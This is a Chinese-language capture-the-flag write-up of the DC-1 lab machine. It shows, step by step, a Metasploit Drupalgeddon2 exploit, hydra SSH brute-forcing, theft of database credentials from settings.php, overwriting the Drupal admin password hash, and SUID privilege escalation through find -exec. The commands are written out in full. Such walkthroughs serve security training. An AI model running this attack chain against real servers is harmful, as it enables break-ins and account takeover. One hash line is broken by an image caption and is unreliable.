将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。

1.使用命令 arp -scan -l 列出当前局域网的所有设备,在DC-1的网络适配器查看到的mac地址和扫描出来的192.168.1.8一致。

arp -scan -l

DC-1靶机writeup_配置文件

DC-1靶机writeup_网络安全_02

**2.**使用nmap来扫描DC-1

nmap -A 192.168.160.26

DC-1靶机writeup_数据库_03

从扫描结果可以看到有22和80端口,因为还不知道DC-1所使用的用户,所以还不能爆破ssh,先访问一下80端口网页。

DC-1靶机writeup_数据库_04

**3.**访问到的web界面,发现需要账号密码登录,使用burp爆破没有结果。但是发现了CMS,尝试去msf的漏洞库搜索一下。

首先了解一下Drupal 它是开源CMS之一 Drupal是CMS内容管理系统并且备受青睐和关注 Drupal可以作为开源软件免费使用 就是附带了cms的php开发框架 使用度颇高

DC-1靶机writeup_网络安全_05

msf漏洞库启动方法

第一步: 启动postgresql数据库: service postgresql start;或者/etc/init.d/postgresql start;

service postgresql start

DC-1靶机writeup_网络安全_06

第二步:初始化MSF数据库:msfdb init;

sudo msfdb init

DC-1靶机writeup_配置文件_07

第三步:运行msfconsole:

msfconsole

DC-1靶机writeup_数据库_08

第四步:在msf中查看数据库连接状态:db_status。

db_status

DC-1靶机writeup_网络安全_09

**4.**在msf漏洞库搜索Drupal,并攻击

启动msf的数据库

msfdb start

DC-1靶机writeup_网络安全_10

启动msfconsole

搜索 search Drupal

DC-1靶机writeup_数据库_11

使用第二个漏洞

use 2

DC-1靶机writeup_网络安全_12

使用show missing查看一下必须要设置的选项

DC-1靶机writeup_数据库_13

需要设置rhosts,就是设置靶机的IP地址

使用set设置

set rhosts 192.168.160.26

使用show options 可以查看设置好的信息

DC-1靶机writeup_配置文件_14

确定设置的信息没问题

输入run开始执行攻击,成功

DC-1靶机writeup_数据库_15

flag1

ls可以看到第一个flag1.txt

DC-1靶机writeup_网络安全_16

第一个falg找到

DC-1靶机writeup_Drupal_17

5.查看一下靶机的用户,发现有个flag4的用户

cat /etc/passwd

DC-1靶机writeup_数据库_18

6 使用hydra来爆破一波看看是否能拿到密码 (Hydra的使用教程)

hydra -l flag4 -P /usr/share/john/password.lst 192.168.160.26 ssh

DC-1靶机writeup_Drupal_19

得到falg4账号的密码为 orange

7.使用ssh连接靶机

ssh flag4@192.168.160.26

DC-1靶机writeup_Drupal_20

flag4

ls在flag4账户的目录下找到了falg4,可想而知还有在前面还有两个flag,可能在web上,因为web有账号

ls
cat flag4.txt

DC-1靶机writeup_网络安全_21

8.既然已经登录进靶机了,那么我们就去查看一下web的配置文件

进入到var/www的目录下

在百度上可以找到drupal的配置文件是

/var/www/sites/default/settings.php

使用命令查看一下

cd / 
cd /var/www
cat sites/default/settings.php

在配置文件中看到了flag2还有数据库的信息

flag2

DC-1靶机writeup_数据库_22

数据库的账号:dbuser 密码: R0ck3t

  1. 使用命令连接数据库
mysql -u dbuser -p

连接成功

DC-1靶机writeup_配置文件_23

查看一下数据表

show databases;

DC-1靶机writeup_数据库_24

使用数据表

use drupaldb;

DC-1靶机writeup_网络安全_25

查看表的数据

show tables;

DC-1靶机writeup_配置文件_26

注意到表里的users

使用命令查看一下

select * from users;

DC-1靶机writeup_Drupal_27

可以看到管理员的账户,但是先要搞hash值,有点难

quit退出数据库连接

10 .搜索一下*hash.sh

find / -name "*hash.sh"

可以看到var/www/scripts下有个sh的脚本

DC-1靶机writeup_Drupal_28

直接执行试试

scripts/password-hash.sh

DC-1靶机writeup_网络安全_29

可以设置密码,尝试一下后面加上密码

scripts/password-hash.sh jw123
#$S$DDJQnCUwMz0vMnJi5MKtGCoeyNWuEpDzZmYWxJm9g/G.gS6AE5ro

得到一个哈希值,那么我们可以将这个哈希值替换到数据库admin得账号下

11、 修改数据库中admin的哈希值

update drupaldb.users set pass='$S$DDJQnCUwMz0vMnJi5MKtGCoeyNWuEpDzZmYWxJm9g/G.gS6AE5ro' where name='admin';

DC-1靶机writeup_Drupal_30

修改成功尝试去web界面登录试试

DC-1靶机writeup_数据库_31

flag3

找到flag3

DC-1靶机writeup_Drupal_32

12 .falg4提示我们提权

DC-1靶机writeup_配置文件_33

flag5

find -name flag4.txt -exec /bin/bash -p \;

/bin/bash -p:这是要执行的命令。/bin/bash 是一个常见的 Unix/Linux shell,而 -p 选项表示以特权(即以 root 用户)运行 bash。这将打开一个交互式 shell 环境,具有 root 用户权限。

DC-1靶机writeup_配置文件_34

查看权限:

whoami #打印当前有效的用户名称 id #显示用户的ID以及所属群组的ID

DC-1靶机writeup_数据库_35

find -name flag4.txt -exec cat /root/thefinalflag.txt \;

DC-1靶机writeup_网络安全_36

DC-1总结

nmap的基础使用,信息收集

msf漏洞库搜索漏洞

使用漏洞攻击靶机拿到shell,找到第一个flag,查看/etc/passwd发现flag4用户

使用hydra爆破ssh登录的账号密码

登陆账号拿到第二个flag

查看到durpal的配置文件,获取到数据库信息,拿到第三个flag

尝试连接数据库,在数据库里发现admin账号,修改管理员的hash值

登录到web界面,拿到第四个flag

提权root拿到第五个flag

方式二

flag1

启动kali 查看本机地址

DC-1靶机writeup_网络安全_37

推测DC-1主机应该在同一网段 所以使用nmap扫扫看

DC-1靶机writeup_配置文件_38

扫到了四 台主机 2 254 26 10

其中可以看到 主机26和10的80端口处于open态 尝试一下

DC-1靶机writeup_配置文件_39

发现了一个CMS 很明显的信息 Drupal

First 先了解一下Drupal 它是开源CMS之一 Drupal是CMS内容管理系统并且备受青睐和关注 Drupal可以作为开源软件免费使用 就是附带了cms的php开发框架 使用度颇高

然后利用 MSF 攻克

DC-1靶机writeup_配置文件_40

先搜索一下可用的 drupal漏洞

DC-1靶机writeup_网络安全_41

这里我们使用第四个18年的这个 :exploit/unix/webapp/drupal_drupalgeddon2

DC-1靶机writeup_数据库_42

提前看一下参数 (options)

DC-1靶机writeup_数据库_43

看到RHOSTS为空 需要我们来配置一下,并查看

DC-1靶机writeup_Drupal_44

其中 配完提前检查再run

DC-1靶机writeup_Drupal_45

完成后就可以利用这个漏洞了

DC-1靶机writeup_数据库_46

发现了flag第一个文件

打开看看 再给我们下一关的提示 (每一个好的CMS都需要一个配置文件--你也是)

DC-1靶机writeup_配置文件_47

flag2

下一个攻克点提示我们在配置文件中

百度上找到drupal的配置文件的绝对路径是 /var/www/sites/default/settings.php

进入durpal 配置文件

逐层解剖 找到flag2文件 进行读取

DC-1靶机writeup_网络安全_48

还有意外收获 不仅得到了flag2 还得到了数据库的user password

flag3

查看3306是否开放 (netstat -anptl) 显示只允许本地连接

DC-1靶机writeup_数据库_49

写进一个python进行交互

python -c "import pty;pty.spawn('/bin/bash')"

DC-1靶机writeup_Drupal_50

登录数据库 前面我们已经拿到了 user password

DC-1靶机writeup_Drupal_51

列出数据库

DC-1靶机writeup_数据库_52

使用drupaldb库 查看里面的表 存在users表

DC-1靶机writeup_数据库_53

查看users表

DC-1靶机writeup_数据库_54

又得到了数据库的用户名和密码 但是password采用了特殊的加密方式 无法解密 换种思路 那我们就来替换它

在scripts录有password-hash.sh文件 是可以用该文件生成自己的密码hash值替换数据库hash达到登陆后台的目的 这里换成admin

DC-1靶机writeup_数据库_55

DC-1靶机writeup_Drupal_56

紧接着替换原来的密码 先进库

替换原始密码的语句 update users set pass='DC-1靶机writeup_数据库_57DBW9j2aCDzy4ErP.VhrfBpUwhfHOEwvjxLtfAOP69pV3CzJK3Hya' where name='admin'

DC-1靶机writeup_数据库_58

转去页面登录 得到flag3

DC-1靶机writeup_Drupal_59

flag4

cat /etc/passwd 发现了一个用户 flag4 白送人头

DC-1靶机writeup_Drupal_60

得到flag4

DC-1靶机writeup_Drupal_61

flag5

flag3提示 提权并提示 -exec 想到suid提权 find 命令

使用find命令查找有特殊权限suid的命令

find / -perm -4000

DC-1靶机writeup_配置文件_62

使用find命令提权

find ./ aaa -exec '/bin/sh' \;

DC-1靶机writeup_配置文件_63

得到flag5

DC-1靶机writeup_网络安全_64